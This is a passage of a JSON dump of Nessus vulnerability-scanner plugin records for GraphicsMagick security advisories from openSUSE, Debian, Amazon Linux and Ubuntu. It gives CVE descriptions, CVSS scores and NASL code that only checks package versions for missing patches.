(CVE-2017-11636)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2018-966.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update GraphicsMagick' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-c++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned 
by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-1.3.28-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-c++-1.3.28-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-c++-devel-1.3.28-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-debuginfo-1.3.28-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-devel-1.3.28-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-doc-1.3.28-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-perl-1.3.28-1.12.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick / GraphicsMagick-c++ / GraphicsMagick-c++-devel / 
etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:35:26", "description": "This update for GraphicsMagick fixes the following issues :\n\n - CVE-2017-11643: Heap overflow in WriteRGBImage() in coders/rgb.c could lead to denial of service [boo#1050611]\n\n - CVE-2017-11636: Heap overflow in WriteCMYKImage() function in coders/cmyk.c could lead to denial of service [boo#1050674]\n\nNote: the function names appear to be transposed in this advisory text; the ALAS-2018-966 description on this page attributes CVE-2017-11636 to WriteRGBImage() in coders/rgb.c and CVE-2017-11643 to WriteCMYKImage() in coders/cmyk.c. Confirm the mapping against the CVE records before triaging by affected coder.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-08-25T00:00:00", "type": "nessus", "title": "openSUSE Security Update : GraphicsMagick (openSUSE-2017-966)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11636", "CVE-2017-11643"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:GraphicsMagick", "p-cpe:/a:novell:opensuse:GraphicsMagick-debuginfo", "p-cpe:/a:novell:opensuse:GraphicsMagick-debugsource", "p-cpe:/a:novell:opensuse:GraphicsMagick-devel", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-q16-12", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-q16-12-debuginfo", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-devel", "p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3", "p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3-debuginfo", "p-cpe:/a:novell:opensuse:libGraphicsMagick3-config", "p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2", "p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2-debuginfo", "p-cpe:/a:novell:opensuse:perl-GraphicsMagick", "p-cpe:/a:novell:opensuse:perl-GraphicsMagick-debuginfo", "cpe:/o:novell:opensuse:42.2", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2017-966.NASL", "href": "https://www.tenable.com/plugins/nessus/102771", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-966.\n#\n# The text description of this plugin is (C) SUSE
LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102771);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-11636\", \"CVE-2017-11643\");\n\n script_name(english:\"openSUSE Security Update : GraphicsMagick (openSUSE-2017-966)\");\n script_summary(english:\"Check for the openSUSE-2017-966 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for GraphicsMagick fixes the following issues :\n\n - CVE-2017-11643: Heap overflow in WriteRGBImage() in\n coders/rgb.c could lead to denial of service\n [boo#1050611]\n\n - CVE-2017-11636: Heap overflow in\n WriteCMYKImage()function in coders/cmyk.c could lead to\n denial of service [boo#1050674]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1050611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1050674\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-Q16-12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-Q16-12-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick3-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = 
get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"GraphicsMagick-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"GraphicsMagick-debuginfo-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"GraphicsMagick-debugsource-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"GraphicsMagick-devel-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick++-Q16-12-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick++-Q16-12-debuginfo-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick++-devel-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick-Q16-3-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick-Q16-3-debuginfo-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick3-config-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagickWand-Q16-2-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagickWand-Q16-2-debuginfo-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"perl-GraphicsMagick-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"perl-GraphicsMagick-debuginfo-1.3.25-11.18.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-debuginfo-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-debugsource-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-devel-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick++-Q16-12-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick++-Q16-12-debuginfo-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick++-devel-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick-Q16-3-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick-Q16-3-debuginfo-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick3-config-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagickWand-Q16-2-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagickWand-Q16-2-debuginfo-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"perl-GraphicsMagick-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"perl-GraphicsMagick-debuginfo-1.3.25-20.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick / GraphicsMagick-debuginfo / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:35:30", "description": "CVE-2017-13776 CVE-2017-13777 denial of service issue in ReadXBMImage()\n\nCVE-2017-12935 The ReadMNGImage function in coders/png.c 
mishandles large MNG images, leading to an invalid memory read in the SetImageColorCallBack function in magick/image.c.\n\nCVE-2017-12936 The ReadWMFImage function in coders/wmf.c has a use-after-free issue for data associated with exception reporting.\n\nCVE-2017-12937 The ReadSUNImage function in coders/sun.c has a colormap heap-based buffer over-read.\n\nCVE-2017-13063 CVE-2017-13064 heap-based buffer overflow vulnerability in the function GetStyleTokens in coders/svg.c\n\nCVE-2017-13065 NULL pointer dereference vulnerability in the function SVGStartElement in coders/svg.c\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 1.3.16-1.1+deb7u9.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-09-01T00:00:00", "type": "nessus", "title": "Debian DLA-1082-1 : graphicsmagick security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12935", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13776", "CVE-2017-13777"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:graphicsmagick", "p-cpe:/a:debian:debian_linux:graphicsmagick-dbg", "p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat", "p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat", "p-cpe:/a:debian:debian_linux:libgraphics-magick-perl", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b3", "p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick3", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1082.NASL", 
"href": "https://www.tenable.com/plugins/nessus/102890", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1082-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102890);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13776\", \"CVE-2017-13777\");\n\n script_name(english:\"Debian DLA-1082-1 : graphicsmagick security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2017-13776 CVE-2017-13777 denial of service issue in\nReadXBMImage()\n\nCVE-2017-12935 The ReadMNGImage function in coders/png.c mishandles\nlarge MNG images, leading to an invalid memory read in the\nSetImageColorCallBack function in magick/image.c.\n\nCVE-2017-12936 The ReadWMFImage function in coders/wmf.c has a\nuse-after-free issue for data associated with exception reporting.\n\nCVE-2017-12937 The ReadSUNImage function in coders/sun.c has a\ncolormap heap-based buffer over-read.\n\nCVE-2017-13063 CVE-2017-13064 heap-based buffer overflow vulnerability\nin the function GetStyleTokens in coders/svg.c\n\nCVE-2017-13065 NULL pointer dereference vulnerability in the function\nSVGStartElement in coders/svg.c\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.3.16-1.1+deb7u9.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has 
extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/08/msg00034.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/graphicsmagick\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphics-magick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick\", reference:\"1.3.16-1.1+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-dbg\", reference:\"1.3.16-1.1+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-imagemagick-compat\", reference:\"1.3.16-1.1+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-libmagick-dev-compat\", reference:\"1.3.16-1.1+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphics-magick-perl\", reference:\"1.3.16-1.1+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick++1-dev\", reference:\"1.3.16-1.1+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick++3\", reference:\"1.3.16-1.1+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick1-dev\", reference:\"1.3.16-1.1+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick3\", 
reference:\"1.3.16-1.1+deb7u9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-09-01T00:25:14", "description": "It was discovered that GraphicsMagick incorrectly handled certain image files. An attacker could possibly use this issue to cause a denial of service or other unspecified impact.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-12-17T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS : GraphicsMagick vulnerabilities (USN-4222-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11638", "CVE-2017-11641", "CVE-2017-11642", "CVE-2017-11643", "CVE-2017-12935", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-13737", "CVE-2017-13775", "CVE-2017-13776", "CVE-2017-13777"], "modified": "2020-09-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:graphicsmagick", "p-cpe:/a:canonical:ubuntu_linux:libgraphicsmagick%2b%2b-q16-12", "p-cpe:/a:canonical:ubuntu_linux:libgraphicsmagick-q16-3", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-4222-1.NASL", "href": "https://www.tenable.com/plugins/nessus/132095", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4222-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(132095);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/17\");\n\n script_cve_id(\"CVE-2017-11638\", \"CVE-2017-11641\", \"CVE-2017-11642\", \"CVE-2017-11643\", \"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13134\", \"CVE-2017-13737\", \"CVE-2017-13775\", \"CVE-2017-13776\", \"CVE-2017-13777\");\n script_xref(name:\"USN\", value:\"4222-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS : GraphicsMagick vulnerabilities (USN-4222-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that GraphicsMagick incorrectly handled certain\nimage files. An attacker could possibly use this issue to cause a\ndenial of service or other unspecified impact.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4222-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected graphicsmagick, libgraphicsmagick++-q16-12 and /\nor libgraphicsmagick-q16-3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgraphicsmagick++-q16-12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgraphicsmagick-q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019-2020 Canonical, Inc. / NASL script (C) 2019-2020 and is owned by Tenable, Inc. 
